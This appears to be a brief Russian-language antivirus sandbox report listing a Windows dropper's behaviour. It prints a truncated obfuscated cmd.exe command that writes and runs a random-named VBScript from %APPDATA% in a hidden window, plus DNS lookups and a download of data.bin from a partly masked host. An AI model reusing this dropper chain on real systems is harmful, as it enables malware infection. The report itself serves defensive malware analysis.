Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "TXmb8Sx=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DIm NQAFxF" "fUnctiON WKFtWsG(Ku,AkJ4uh)" "KJl=78" "WKFtWsG=(Ku And noT AkJ4uh)oR(NOt Ku aND AkJ4uh)" "XjsYp=14" "enD FUncTIon" "Sub F...
- %APPDATA%\1821.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\1821.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "TXmb8Sx=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DIm NQAFxF" "fUnctiON WKFtWsG(Ku,AkJ4uh)" "KJl=78" "WKFtWsG=(Ku And noT AkJ4uh)oR(NOt Ku aND AkJ4uh)" "XjsYp=14" "enD FUncTIon" "Sub F...' (со скрытым окном)